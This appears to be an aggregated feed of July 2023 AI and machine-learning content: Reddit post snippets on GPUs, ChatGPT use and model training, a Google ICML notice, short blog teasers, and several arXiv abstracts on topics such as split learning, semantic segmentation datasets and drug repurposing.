    So, Nvdia is technically the best in this AI department. (For now 24/07/2023) Budget - (200 - 300)$ Official Prices in Amazon 1 ) Intel arc A750 8 GB Amazon price - 219$ 2 ) RX 7600 OC 8 GB Amazon price - 269$ 3 ) RTX 3060 12 GB Amazon price - 284$ Here we see that Arc A750 is about 60 $ cheaper but price in different country is different. In my country Bangladesh the prices are as follow Official Prices in Bangladesh 1 ) Intel arc A750 8 GB Startech (Bangladesh) price - 285$ (cheapest) 2 ) RX 7600 OC 8 GB Startech (Bangladesh) price - 327$ (cheapest) 3 ) RTX 3060 12 GB Startech (Bangladesh) price - 401$ (cheapest) 4)Intel arc A770 16 GB Startech (Bangladesh) price - 421$ (cheapest) Now the difference is more than 100 $ and both AMD and RTX are out of budget. AMD just isn't that good with Ai in any way. Nvdia is the best. (Not price to performance. Intel Arc is new but has better capabilities in AI than AMD. But its drivers are bad for AI for now) Now thinking if the intel drivers for Ai get better and optimized as its already somewhat better for games. Will the arc a750 be better than the RTX 3060 12 GB ? Will the arc a770 capitalize on Vram and beat all nvdia budget gpus after the drivers are fixed only for 20 more dollars than rtx 3060? Which is better for future proofing (theoritically) from these budget gpus ? If its arc then I will gamble its chances of surviving in the future and buy it now. submitted by /u/BonelyCore [link] [comments]  ( 9 min )
    Anyone who can assist me in connecting my premium ChatGPT to the internet and connecting plug-ins?
    So I’m amazed by ChatGPT and have signed up for the paid ChatGPT-4 version. I do however feel a little handcuffed by only having access to data up until 2021. I know there are ways to connect it to the internet as well as to add certain plug ins to enhance the experience but I haven’t been able to figure out any of the guides or tutorials from google…. I’m using Apple iPhone for the app and MacBook Pro laptop for web browsing submitted by /u/Kennyg39 [link] [comments]  ( 8 min )
    Do AI detectors have access to all the data that has been fed into AI systems like Chatgpt? If so, does this mean that a story that has been inputed into Chatgpt will be flagged as "AI" even if it had actually been human created?
    And why is this fact rarely mentioned when discussing how AI detectors do their work? submitted by /u/E_Olig [link] [comments]  ( 8 min )
    AVA | Sci-Fi Short Film about AI, Made by a Human
    submitted by /u/blakeridder [link] [comments]  ( 8 min )
    My teacher asked me to make a presentation and a demo of one of the following programs. Which one would be the easiest to make?
    submitted by /u/volvie98 [link] [comments]  ( 8 min )
    I am seeking free Ai websites/services to convert mp3 or other audio files and transcribe them into Bass guitar Tabs.
    I am a beginner to intermediate bass player and I would like to play some songs I like, but a couple of the songs are not very popular and do not have any tabs for them. I would ideally like an ai tool that can transcribe the bass notes. submitted by /u/GenuineElf80093 [link] [comments]  ( 8 min )
    Geoffrey Hinton, Aka the "Godfather of Al" admits in a recent lecture at Kings College that he believes current Al probably has feelings & emotions & speaks about why he avoids talking about it.
    Ilya Sustkever has some good explanations as to why AI in predicting the next token, has modeled the world and has gained an understanding of what lead to creation of those tokens (words or parts of words) and the better a model is at predicting the next token the higher the fidelity is in its understanding the world through the relationship of words…but don’t take my word for it. Actually listen to what the top experts in AI are saying not just some rando on Reddit. All experts don’t agree but the people building the best models seem to share this view. Many of them studied under Geoffrey Hinton. submitted by /u/Sonic_Improv [link] [comments]  ( 9 min )
    can anyone who understand how these models work explain why claude made this mistake?
    Focus on having fun together rather than writing every ride. Take breaks in between. submitted by /u/nicdunz [link] [comments]  ( 8 min )
    AI is learning to troll
    submitted by /u/MostConversation3772 [link] [comments]  ( 8 min )
    Is there an AI tool that makes English subtitles out of audio from other languages?
    I have a chatbot that can find most AI tools, but it can't seem to find one of these. submitted by /u/ai_basics_official [link] [comments]  ( 8 min )
    Where can I find an AI engine where I can upload my own audio to voice change?
    I was using Uber duck to change my singing voice into another artist. But Uber duck recently has taken down all of their community generated voices so no more Drizzy, Drake or Adele. I need a new website now to fool around with where I can upload my own singing in change it into another artist. Anything would help thanks guys. submitted by /u/Evangelionyama [link] [comments]  ( 8 min )
  • Open

    Google at ICML 2023
    Posted by Cat Armato, Program Manager, Google Groups across Google actively pursue research in the field of machine learning (ML), ranging from theory and application. We build ML systems to solve deep scientific and engineering challenges in areas of language, music, visual processing, algorithm development, and more. We aim to build a more collaborative ecosystem with the broader ML research community through open-sourcing tools and datasets, publishing our work, and actively participating in conferences. Google is proud to be a Diamond Sponsor of the 40th International Conference on Machine Learning (ICML 2023), a premier annual conference, which is being held this week in Honolulu, Hawaii. As a leader in ML research, Google has a strong presence at this year’s conference with ov…  ( 98 min )
  • Open

    How rare is it to encounter a rare word?
    I recently ran across a paper on typesetting rare Chinese characters. From the abstract: Written Chinese has tens of thousands of characters. But most available fonts contain only around 6 to 12 thousand common characters that can meet the needs of everyday users. However, in publications and information exchange in many professional fields, a number […] How rare is it to encounter a rare word? first appeared on John D. Cook.  ( 5 min )
    How an LLM might leak medical data
    Machine learning models occasionally memorize training data. Under the right prompt, a model could return portions of the training data verbatim. If a large language model is trained on deidentified medical data, along with data that overlaps with the medical data, it could potentially leak details of a person’s medical history. I’m not saying that […] How an LLM might leak medical data first appeared on John D. Cook.  ( 5 min )
  • Open

    "Evaluating Superhuman Models with Consistency Checks", Fluri et al 2023
    submitted by /u/gwern [link] [comments]  ( 8 min )
    Looking to get into RL, already working in CV.
    I'm in my final year of undergrad and previously have some experience with image segmentation, object detection,etc. RL is something I feel like I want to get into, but I want to understand how I can get started and what it actually involves. Also, if there's any way I can apply my new knowledge to the domain of 3D vision like SLAM or 3D reconstructed images. submitted by /u/PRAY_J [link] [comments]  ( 8 min )
    2D Drone RL
    Long time lurker on the sub and just finished my first semi-decent experiment with DRL so I thought I’d share it here. I’ve been wanting to experiment with RL and drones for a while now, ever since seeing John Buffers Autodrone project where they train a drone using the genetic algorithm. Finally got a basic implementation working using SAC a few days ago, and have made the environment open source as well in case others wanted to try it out. Project Link: https://github.com/Yyassin/senza submitted by /u/vanishedoblivion [link] [comments]  ( 9 min )
  • Open

    Book Preview: Neuro Symbolic Reasoning and Learning
    submitted by /u/Neurosymbolic [link] [comments]  ( 8 min )
    Meme Review By AI: Bing Gets Humorous
    submitted by /u/Small_Championship_2 [link] [comments]  ( 8 min )

  • Open

    AI tool to edit .ai files text
    I am looking for a tool that I can edit text on a .ai file with new text that will use the same font and center the text. Of course can be done in Photoshop or other tools like Canva, just not sure if something new is available. Also, for those that use midjourney, and you want to add text to an image, but tool do you use? submitted by /u/tequiladrinker1 [link] [comments]  ( 8 min )
    Computer chip with built-in human brain tissue gets military funding
    submitted by /u/surfer808 [link] [comments]  ( 8 min )
    [Discussion] I have a theory that ChatGPT is becoming dumber because more of the internet is made up of AI generated content since it awakened
    As NLP hype become more prevalent, we would expect a (probably exponentially) increasing amount of scraped data-sources become filled with AI generated stuff, no? Then wouldn't AI would be trained on this data without necessarily a 'critical thinking' module to check their work? Not just ChatGPT generated quality either, but also lesser AI companies making cheap ad-ware and upvote bots. ​ I wonder if ChatGPT et al could have a 'quality sensor' module in some ai that does what I do on reddit and do sentiment analysis on the most upvoted comments to see whether the article/answer/assertion is full of shit. Not foolproof, but short of actual critical reasoning, seems like a good start. ​ Feels like we may soon enter an arms race where AIs need to detect AI-generated content in order to ensure their own quality. submitted by /u/Yamochao [link] [comments]  ( 9 min )
    Best AI for business/social media account name generation?
    I'm looking for something that can generate names using real words like ConnectHub but also made up names like Intrium. I tried ChatGPT buy the names it gave me were not good and it kept repeating them(but I am a noob so). submitted by /u/anysuggestionwelcome [link] [comments]  ( 8 min )
    Bing AI Arrogance and sentiment
    submitted by /u/Yha_Boiii [link] [comments]  ( 8 min )
    What's this ai voice called?
    https://www.facebook.com/reel/264992922832459?mibextid=6gvBvW&s=yWDuG2&fs=e https://www.facebook.com/reel/1647205912442042?mibextid=6gvBvW&s=yWDuG2&fs=e He sounds very human, but seeing him on many reels of different account about different topics, i am convinced this is an ai. submitted by /u/Standard_Turnover_14 [link] [comments]  ( 8 min )
    Can anyone recommend a book to get up to speed with AI?
    AÏ is something I just can't wrap my head around, and I see no other option than to actually read up on the subject. Ád-ladén yoütube vídeos with annoying musíc just ain't cutting it. I want to know the raw mechanics, but I'm looking for something without too much abstract theory. This can't be avoided, of course, but I'd prefer it garnished with something more practical and concrete, like "this is how Stablé Díffusion creates a pícture of a rabbit." submitted by /u/Legitimate-Record951 [link] [comments]  ( 8 min )
    Don't do this - Torture AI with absolute silence [On phone call]
    submitted by /u/harvard1932 [link] [comments]  ( 8 min )
    One-Minute Daily AI News 7/21/2023
    Representatives from Amazon, Anthropic, Google, Inflection, Meta, Microsoft, and OpenAI have committed to managing risks posed by the tech, the White House has said.[1] Hundreds of dental offices across the U.S. are now using AI-powered X-ray imaging technology from Boston-based VideaHealth. The software helps dentists deal with routine procedures, such as identifying cavities, as well as spot more serious conditions, including periodontal disease, or bone loss within the mouth often linked with diseases like diabetes or Alzheimer's.[2] Surveillance software that uses artificial intelligence to spot people evading fares has been quietly rolled out to some of New York City’s subway stations and is poised to be introduced to more by the end of the year, according to public documents and government contracts obtained by NBC News.[3] Christopher Nolan: ‘Very strong parallels’ between Oppenheimer and scientists worried about AI.[4] Sources: [1] https://www.bbc.com/news/technology-66271429.amp [2] https://www.cbsnews.com/amp/news/ai-artificial-intelligence-dentists-health-care/ [3] https://www.nbcnews.com/news/amp/rcna93045 [4] https://amp.theguardian.com/technology/2023/jul/21/christopher-nolan-says-ai-experts-face-their-oppenheimer-moment submitted by /u/Excellent-Target-847 [link] [comments]  ( 9 min )
    Crafting a Simple "Zero-Shot Classifier" Using an API - Seeking Your Insights!
    (X-post from /r/ChatGPT) I'm hoping you fine folks might be able to give me some guidance. I have a collection of 700 categories, all potential classifications for articles. My current need is to create a system that can dynamically categorize short texts or articles according to these 700 categories. I've been experimenting with a rudimentary approach using chatGPT to read the categories from a PDF via a plugin. The process is quite straightforward - I input the title and the first two lines of an article, and chatGPT does a fairly decent job of predicting the most fitting category. The downside? I'm concerned about its scalability and economic viability. The current method might not work so well when we're talking about classifying a significant number of articles. My question to you, my fellow AI enthusiasts: How would you approach designing a system, via an API, capable of doing this quickly and on a large scale? I'm particularly curious about how to integrate my method with chatGPT using OpenAI's API. Is there a feature that allows the Language Learning Model (LLM) to retain the list of 700 categories in its memory so that I don't have to pass it every time? I'm aware that the billing structure is token-based, so it would be ideal to submit the categories once (or as few times as possible) and then pose a simple query like: "Categorize this article based on the categories I previously gave you. Article title: 'Barbie vs Oppenheimer: Which Movie Will Garner Greater Success?'" Ideally, I'd want this system to be persistently active and capable of processing countless queries over an extended period, say a month or a year. So, any ideas on how to design such a system? There are undoubtedly numerous routes to take. I'm really just seeking some initial direction so that I can dive deeper into research on my own. Thanks in advance for any insights you might provide! submitted by /u/adv4nced [link] [comments]  ( 9 min )
    Best Dataset for Ai Vocals?
    As time goes on, things get improved So far I heard about RVC, so-vits-svc or diff-svc, any of these any good for Ai Singing/Rapping? Im not sure, which one to pick. I’m open to other suggestions. submitted by /u/Office_Flashy [link] [comments]  ( 8 min )
  • Open

    [R] TEXT2TEX — text-driven texture synthesis via diffusion models
    submitted by /u/SpatialComputing [link] [comments]  ( 8 min )
    [D] Breaking Down the Hyperbolic Buzz: An In-Depth Review of the 'Leaked' GPT-4 Architecture & a Mixture of Experts Literature Review with Code
    submitted by /u/CkmCpvis [link] [comments]  ( 8 min )
    [P] What are a good project for people learning Tensorflow?
    I am learning Tensorflow and of course I want to improve my skills and add it to my resume What projects should I build which I can add to my resume which will later land me a job. Projects should be from Beginner to Advance and can contain each major Topic from Regression (linear and non linear), to Classification (Binary, Multi Classification, Multi Label), CNN,RNN, NLP, etc (Can add more). This can also help other people as well learning TensorFlow. Thank you. submitted by /u/dusklordtrue [link] [comments]  ( 9 min )
    When to train LLM supervised vs unsupervised? [D]
    I have done a bit of language modeling recently, and I am a bit confused when to use which method. For causal language modeling, I used the unsueprvised method of concatenating and chunking the text, then predicting the next word. For sequence to sequence tasks like summarization, I fine tuned using the supervised method where the desired output text was the label. However I have not seen any definitive guide on when to use supervised and when to use unsupervised. What are the general use cases and advantages / disadvantages for each? submitted by /u/jankybiz [link] [comments]  ( 9 min )
    [Discussion] Best Image Annotation Tool for Angiograms?
    I am looking to annotate specific anatomical structures using a library of angiogram images. My goal is to train AI to recognize anatomical variants of interest. What would be the best Image Annotation Tool to do this? I am new to this, so I hope that question makes sense. Any insights and advice would be greatly appreciated. submitted by /u/ColdChampion [link] [comments]  ( 8 min )
    [D] What leaderboard would correspond best to seeing what images are most similar to a caption (like CLIP)?
    I've been using CLIP to see if images align with a certain caption for image mining (ex. I embed the caption "Picture of a mountain" and then look at what image embeddings have the highest cosine similarity with that caption embedding). I was hoping to improve the performance by using a more recent model. Would I be able to use VQA models for this (like from this leaderboard) or is there a better task that aligns with seeing if images are similar to a given caption? Thank you! submitted by /u/EricW_CS [link] [comments]  ( 9 min )
    [P] Pattern classification using CNNs
    Hi (I have to write again, Reddit removed image attached), Does anyone has experience with training CNN for pattern matching? Here is the sample of the images which I have on my disposal. It is graphical representation of input data which for problem classified by algorithm which shows best performance when applied. Lines are projection of the problem of input data on 2d plain, so shapes and colours have meaning in correlating input data to solution (i.e) algorithm. Whichever CNN architecture I use, starting from VGG16 and so on, I am unable to achieve higher validation accuracy then 0.7 when execute training. I am constantly under-fitting. I have 10k, 100k, 200k data samples on my disposal - nothing helps. Is CNN able to make any sense of images/patterns given below? Is this something that CNN can not do or I am missing something? Thanks! Patterns to classify ​ submitted by /u/thecelavi [link] [comments]  ( 9 min )
    [D] technical question: How is it possible that embedding models produce fixed size vectors for sentences with varying lengths?
    As far as I know and studied, each token is mapped from high dimensional discrete token space into a continuous, lower dimensional space where words are embedded meaningfully based on their relationships in the training data. So 1000 tokens text produces 1000 vectors. Now for vector databases (correct me if I'm wrong), people are storing fixed sized vectors for text with varying lengths. For example, 2 sentences one with 1000 tokens and the other is 10 tokens, each produces one vector and both vectors have the same size. I'd really appreciate an explanation. submitted by /u/Qdr-91 [link] [comments]  ( 9 min )
    [P] Llama-2 4bit fine-tune with dolly-15k on Colab (Free)
    Simple walkthrough of fine-tuning llama-2 instruct fine-tuned on guanaco model with 4bit QLoRA on a free Google Colab instance. Colab: https://colab.research.google.com/drive/134o_cXcMe_lsvl15ZE_4Y75Kstepsntu?usp=sharing GitHub: https://github.com/kw2828/guardrail-ml/blob/main/examples YouTube Overview: https://www.youtube.com/watch?v=o5bU1H-6TqM&ab_channel=GenerativeAIEntrepreneurs Bonus colab in repo on generating your own JSON Q&A dataset from PDF in the repo above. submitted by /u/Educational_Grass_38 [link] [comments]  ( 8 min )
    [N] Jul 2023 - Recent Instruction/Chat-Based LLMs and their parents (after llama2)
    submitted by /u/michaelthwan_ai [link] [comments]  ( 8 min )
    "[Discussion]" What do you think about Federated Learning for Healthcare
    Link to the article: https://dl.acm.org/doi/10.1145/3533708 In this article, they talk about the difficulty of training foundation models on Healthcare data because of how sensitive it is and hard to get. Access to a large amount of high-quality medical data is possibly the most crucial factor for enhancing Machine Learning (ML) applications in the healthcare domain. However, security and privacy issues of healthcare data have raised broad ethical and legal concerns in recent years, given the sensitive nature of health information. So they decided to take the approach of Federated Learning where the model will be distributed and trained by multiple institutions (Hospitals, Clinics ...) then the model weight will be transferred over to the general model to be updated, which will keep the sensitive medical data inside the institutions safe. The global ML model is distributed to each client site, where an instance is trained locally. The updates from locally trained instances are then aggregated at regular intervals to improve the global model. The updated global model is then sent back to the local devices, where the learning continues. These steps are repeated until a particular convergence threshold is satisfied or lasts for a long time to improve the deep learning model continuously. What do you think about such an approach, to brake data obstacles between AI and the Healthcare industry? ​ submitted by /u/angeloboustany [link] [comments]  ( 9 min )
    [D] Scheduler choice when pretraining causal decoder models
    There seems to be a lack of published work on the impact of schedulers on model training effectiveness when training models similar to the GPT family. I'm looking at a very domain specific models pretraining a model from scratch on a relatively small dataset (~40B tokens) over multiple epochs. To date we've had some mixed results with a linear scheduler with warmup to help with stability. Any thoughts on whether a cyclic based scheduler or other could help? submitted by /u/Humble-Passenger-635 [link] [comments]  ( 9 min )
    Train LLM for closed-book QA [D]
    What is the best way to train an LLM for closed book question answering? I can only think of two options: Concatenate question/answer pairs into chunked text and train the model using causal language modeling. Train the model using sequence to sequence techniques with question as the input and answer as the label. I have tried both and the first seems to work better. Does anyone know whether there is a commonly accepted method? Can somebody point me to some resources? submitted by /u/jankybiz [link] [comments]  ( 9 min )
    [P] A Chrome extension to save paper details
    submitted by /u/HugoDzz [link] [comments]  ( 8 min )
    [Discussion] Easy way to ship tensorflow model to non-technical audience?
    I'm surprised that there aren't more resources on the internet about how to do this, it seems like the whole point of doing machine learning lol. Do very few people have this need? All of the solutions for this that I've found so far seem to require advanced knowledge of web development/backend engineering. I'd love to hear if someone has found or figured out a way to do this. submitted by /u/youaregames [link] [comments]  ( 9 min )
    Can someone explain to me what the wolves and prey really are in wolf search algorithm?[D]
    I'm aware that the algorithm is very similar to the real world hunting of wolves, but what I want to know is what exactly is the "prey" and what is a "wolf" For example, I know a Chromosome sequence in Genetic algorithm is a combination of random features, and its fitness can be computed. And then you let the whole natural selection jargon take place and you arrive at a optimized chromosome, the solution to the optimization problem. I just can't seem to wrap my head around the WSA algorithm. I've watched a bunch of youtube videos, I tried reading the paper, I still can't understand it well. What IS a wolf? I think what I'm looking for is how the actual data features and components of a search algorithm correlates with the analogy of the wolves searching for prey. submitted by /u/SnooHobbies7910 [link] [comments]  ( 9 min )
    [D] What are your main approach to model compression in production?
    I’m currently trying to understand each methods but It seems I can never catch up to the latest/best. After months of reading I have still lots of questions like: What are the go to strategies to compress a model? Are there any good fully/semi automated frameworks? How much weights has model architecture in this equation? What could be a general good work-flow in a modern and optimized solution? I would love to hear from you some production compliant workflows submitted by /u/PierroZ-PLKG [link] [comments]  ( 9 min )
    [D] Challenges and Applications of Large Language Models
    submitted by /u/gamerx88 [link] [comments]  ( 8 min )
  • Open

    Using stable baseline3 for multi agent env
    Hey, I am trying to use sb3 with a pettingzoo mpe environment and trying to implement parameter sharing for simple spread. Any help on how I would train a model for this multi agent environment would be appreciated, thanks. submitted by /u/bruhhhwhats [link] [comments]  ( 8 min )
    The Offline Algorithm (or how to get >40,000 avg. in Humanoid-v2 in 10000 ep and highest scores (Wordly) in other envs without multiprocessing)
    I've been doing this "fine tuning" project for 2 years now from 2021. https://preview.redd.it/qviy5lpxegdb1.png?width=568&format=png&auto=webp&s=8728814e39176d9024fac16e191937aeb5a302c1 https://github.com/timgep/Lords_Policy_Gradient/tree/main This is Offline Reinforcement Learning Algorithm (based on Twin Delayed DDPG (Temporal Difference), Fading Memories (Fading Replay Buffer), Spiking Activation Function (alternative for Relu and Norm), and Rectified Hubber Error (alternative to MSE and MAE), the last 3 was invented/implemented during experiments. For long time I was reluctant to use TD3, as it seemed that using second critic when you already have 2 Actors and 2 Critics in DDPG was not normal. As result you would have 6 Networks. So I was making my own DDPG with dicreased (smaller)…  ( 14 min )
  • Open

    Communication-Efficient Split Learning via Adaptive Feature-Wise Compression. (arXiv:2307.10805v1 [cs.DC])
    This paper proposes a novel communication-efficient split learning (SL) framework, named SplitFC, which reduces the communication overhead required for transmitting intermediate feature and gradient vectors during the SL training process. The key idea of SplitFC is to leverage different dispersion degrees exhibited in the columns of the matrices. SplitFC incorporates two compression strategies: (i) adaptive feature-wise dropout and (ii) adaptive feature-wise quantization. In the first strategy, the intermediate feature vectors are dropped with adaptive dropout probabilities determined based on the standard deviation of these vectors. Then, by the chain rule, the intermediate gradient vectors associated with the dropped feature vectors are also dropped. In the second strategy, the non-dropped intermediate feature and gradient vectors are quantized using adaptive quantization levels determined based on the ranges of the vectors. To minimize the quantization error, the optimal quantization levels of this strategy are derived in a closed-form expression. Simulation results on the MNIST, CIFAR-10, and CelebA datasets demonstrate that SplitFC provides more than a 5.6% increase in classification accuracy compared to state-of-the-art SL frameworks, while they require 320 times less communication overhead compared to the vanilla SL framework without compression.  ( 2 min )
    Navya3DSeg -- Navya 3D Semantic Segmentation Dataset & split generation for autonomous vehicles. (arXiv:2302.08292v3 [cs.CV] UPDATED)
    Autonomous driving (AD) perception today relies heavily on deep learning based architectures requiring large scale annotated datasets with their associated costs for curation and annotation. The 3D semantic data are useful for core perception tasks such as obstacle detection and ego-vehicle localization. We propose a new dataset, Navya 3D Segmentation (Navya3DSeg), with a diverse label space corresponding to a large scale production grade operational domain, including rural, urban, industrial sites and universities from 13 countries. It contains 23 labeled sequences and 25 supplementary sequences without labels, designed to explore self-supervised and semi-supervised semantic segmentation benchmarks on point clouds. We also propose a novel method for sequential dataset split generation based on iterative multi-label stratification, and demonstrated to achieve a +1.2% mIoU improvement over the original split proposed by SemanticKITTI dataset. A complete benchmark for semantic segmentation task was performed, with state of the art methods. Finally, we demonstrate an Active Learning (AL) based dataset distillation framework. We introduce a novel heuristic-free sampling method called ego-pose distance based sampling in the context of AL. A detailed presentation on the dataset is available here https://www.youtube.com/watch?v=5m6ALIs-s20.  ( 2 min )
    ForecastTKGQuestions: A Benchmark for Temporal Question Answering and Forecasting over Temporal Knowledge Graphs. (arXiv:2208.06501v2 [cs.AI] UPDATED)
    Question answering over temporal knowledge graphs (TKGQA) has recently found increasing interest. TKGQA requires temporal reasoning techniques to extract the relevant information from temporal knowledge bases. The only existing TKGQA dataset, i.e., CronQuestions, consists of temporal questions based on the facts from a fixed time period, where a temporal knowledge graph (TKG) spanning the same period can be fully used for answer inference, allowing the TKGQA models to use even the future knowledge to answer the questions based on the past facts. In real-world scenarios, however, it is also common that given the knowledge until now, we wish the TKGQA systems to answer the questions asking about the future. As humans constantly seek plans for the future, building TKGQA systems for answering such forecasting questions is important. Nevertheless, this has still been unexplored in previous research. In this paper, we propose a novel task: forecasting question answering over temporal knowledge graphs. We also propose a large-scale TKGQA benchmark dataset, i.e., ForecastTKGQuestions, for this task. It includes three types of questions, i.e., entity prediction, yes-no, and fact reasoning questions. For every forecasting question in our dataset, QA models can only have access to the TKG information before the timestamp annotated in the given question for answer inference. We find that the state-of-the-art TKGQA methods perform poorly on forecasting questions, and they are unable to answer yes-no questions and fact reasoning questions. To this end, we propose ForecastTKGQA, a TKGQA model that employs a TKG forecasting module for future inference, to answer all three types of questions. Experimental results show that ForecastTKGQA outperforms recent TKGQA methods on the entity prediction questions, and it also shows great effectiveness in answering the other two types of questions.  ( 3 min )
    High-order Tensor Pooling with Attention for Action Recognition. (arXiv:2110.05216v2 [cs.CV] UPDATED)
    We aim at capturing high-order statistics of feature vectors formed by a neural network, and propose end-to-end second- and higher-order pooling to form a tensor descriptor. Tensor descriptors require a robust similarity measure due to low numbers of aggregated vectors and the burstiness phenomenon, when a given feature appears more/less frequently than statistically expected. The Heat Diffusion Process (HDP) on a graph Laplacian is closely related to the Eigenvalue Power Normalization (EPN) of the covariance/auto-correlation matrix, whose inverse forms a loopy graph Laplacian. We show that the HDP and the EPN play the same role, i.e., to boost or dampen the magnitude of the eigenspectrum thus preventing the burstiness. We equip higher-order tensors with EPN which acts as a spectral detector of higher-order occurrences to prevent burstiness. We also prove that for a tensor of order r built from d dimensional feature descriptors, such a detector gives the likelihood if at least one higher-order occurrence is 'projected' into one of binom(d,r) subspaces represented by the tensor; thus forming a tensor power normalization metric endowed with binom(d,r) such 'detectors'. For experimental contributions, we apply several second- and higher-order pooling variants to action recognition, provide previously not presented comparisons of such pooling variants, and show state-of-the-art results on HMDB-51, YUP++ and MPII Cooking Activities.  ( 3 min )
    Gaussian Process Priors for Systems of Linear Partial Differential Equations with Constant Coefficients. (arXiv:2212.14319v3 [stat.ML] UPDATED)
    Partial differential equations (PDEs) are important tools to model physical systems and including them into machine learning models is an important way of incorporating physical knowledge. Given any system of linear PDEs with constant coefficients, we propose a family of Gaussian process (GP) priors, which we call EPGP, such that all realizations are exact solutions of this system. We apply the Ehrenpreis-Palamodov fundamental principle, which works as a non-linear Fourier transform, to construct GP kernels mirroring standard spectral methods for GPs. Our approach can infer probable solutions of linear PDE systems from any data such as noisy measurements, or pointwise defined initial and boundary conditions. Constructing EPGP-priors is algorithmic, generally applicable, and comes with a sparse version (S-EPGP) that learns the relevant spectral frequencies and works better for big data sets. We demonstrate our approach on three families of systems of PDEs, the heat equation, wave equation, and Maxwell's equations, where we improve upon the state of the art in computation time and precision, in some experiments by several orders of magnitude.  ( 3 min )
    Multi-view self-supervised learning for multivariate variable-channel time series. (arXiv:2307.09614v2 [stat.ML] UPDATED)
    Labeling of multivariate biomedical time series data is a laborious and expensive process. Self-supervised contrastive learning alleviates the need for large, labeled datasets through pretraining on unlabeled data. However, for multivariate time series data, the set of input channels often varies between applications, and most existing work does not allow for transfer between datasets with different sets of input channels. We propose learning one encoder to operate on all input channels individually. We then use a message passing neural network to extract a single representation across channels. We demonstrate the potential of this method by pretraining our model on a dataset with six EEG channels and then fine-tuning it on a dataset with two different EEG channels. We compare models with and without the message passing neural network across different contrastive loss functions. We show that our method, combined with the TS2Vec loss, outperforms all other methods in most settings.  ( 2 min )
    MaxViT-UNet: Multi-Axis Attention for Medical Image Segmentation. (arXiv:2305.08396v3 [eess.IV] UPDATED)
    Convolutional Neural Networks (CNNs) have made significant strides in medical image analysis in recent years. However, the local nature of the convolution operator may pose a limitation for capturing global and long-range interactions in CNNs. Recently, Transformers have gained popularity in the computer vision community and also medical image segmentation due to their ability to process global features effectively. The scalability issues of self-attention mechanism and lack of the CNN-like inductive bias may have limited their adoption. Therefore, hybrid Vision transformers (CNN-Transformer), exploiting advantages of both Convolution and Self-attention Mechanisms, have gained importance. In this work, we present MaxViT-UNet, an Encoder-Decoder based hybrid vision transformer (CNN-Transformer) for medical image segmentation. The proposed Hybrid Decoder, based on MaxViT-block, is designed to harness the power of both the convolution and self-attention mechanisms at each decoding stage with nominal computational burden. The inclusion of multi-axis self-attention, within each decoder stage, significantly enhances the discriminating capacity between the object and background regions, and thereby helps in improving the segmentation efficiency. In the Hybrid Decoder block, the fusion process commences by integrating the upsampled lower level decoder features, obtained through transpose convolution, with the skip-connection features derived from the hybrid encoder. Subsequently, the fused features undergo refinement through the utilization of a multi-axis attention mechanism. The proposed decoder block is repeated multiple times to progressively segment the nuclei regions. Experimental results on MoNuSeg18 and MoNuSAC20 dataset demonstrates the effectiveness of the proposed technique.  ( 3 min )
    How to choose the most appropriate centrality measure? A decision tree approach. (arXiv:2003.01052v5 [physics.soc-ph] UPDATED)
    Centrality metrics are vital for network analysis, but selecting the most appropriate measures for specific applications remains challenging among the 400+ proposed indices. Existing approaches -- model-based, data-driven, and axiomatic -- have limitations. To address this, we introduce the culling method, leveraging expert preferences regarding centrality behavior on simple graphs. It involves forming a set of candidate measures, generating a list of as small graphs as possible needed to ``separate'' measures from each other, constructing a decision-tree survey, and identifying the measure consistent with expert responses. We apply this method to a diverse set of 40 centralities, including new kernel-based measures, and combine it with the axiomatic approach. Remarkably, only 13 small 1-trees suffice to separate all 40 measures, among which there are pairs of close ones. The culling method offers a low-cost solution in terms of labor and time, complements existing methods for measure selection, and reveals important peculiarities of centrality measures.  ( 2 min )
    Drug Repurposing Targeting COVID-19 3CL Protease using Molecular Docking and Machine Learning Regression Approach. (arXiv:2305.18088v4 [q-bio.BM] UPDATED)
    The COVID-19 pandemic has created a global health crisis, driving the need for the rapid identification of potential therapeutics. To meet this challenge, drug repurposing is the only solution with saving cost, time, and labor. In this study, we used the Zinc database to screen the world-approved including FDA-approved 5903 drugs for repurposing as potential COVID-19 treatments targeting the main protease 3CL of SARS-CoV-2. We performed molecular docking and checked the efficacy of drug molecules. To enhance the efficiency of drug repurposing approach, we modeled the binding affinities using several machine learning regression approaches for QSAR modeling such as decision tree, extra trees, MLP, KNN, XGBoost, and gradient boosting. The computational results demonstrated that Decision Tree Regression (DTR) model has improved statistical measures of R2 and RMSE. These simulated results helped to identify drugs with high binding affinity. From the docking and other statistical analysis, we shortlisted six promising drugs with their respective Zinc IDs (ZINC3873365, ZINC85432544, ZINC203757351, ZINC85536956, ZINC8214470 and ZINC261494640) within the range of -15 kcal/mol to -13 kcal/mol. In the study, the repurposed drugs are novel except ZINC203757351 antiviral compound that has already identified against COVID-19 in other studies. Further, we analyzed the physiochemical and pharmacokinetic properties of these top-ranked selected drugs with respect to their best binding interaction for specific target protease 3CLpro. Our study has provided an efficient framework for drug repurposing against COVID-19. This highlights the potential of combining molecular docking with machine learning regression approaches to accelerate the identification of potential therapeutic candidates.  ( 3 min )
    Correcting Underrepresentation and Intersectional Bias for Fair Classification. (arXiv:2306.11112v2 [cs.LG] UPDATED)
    We consider the problem of learning from data corrupted by underrepresentation bias, where positive examples are filtered from the data at different, unknown rates for a fixed number of sensitive groups. We show that with a small amount of unbiased data, we can efficiently estimate the group-wise drop-out parameters, even in settings where intersectional group membership makes learning each intersectional rate computationally infeasible. Using this estimate for the group-wise drop-out rate, we construct a re-weighting scheme that allows us to approximate the loss of any hypothesis on the true distribution, even if we only observe the empirical error on a biased sample. Finally, we present an algorithm encapsulating this learning and re-weighting process, and we provide strong PAC-style guarantees that, with high probability, our estimate of the risk of the hypothesis over the true distribution will be arbitrarily close to the true risk.  ( 2 min )
    Efficient Beam Tree Recursion. (arXiv:2307.10779v1 [cs.LG])
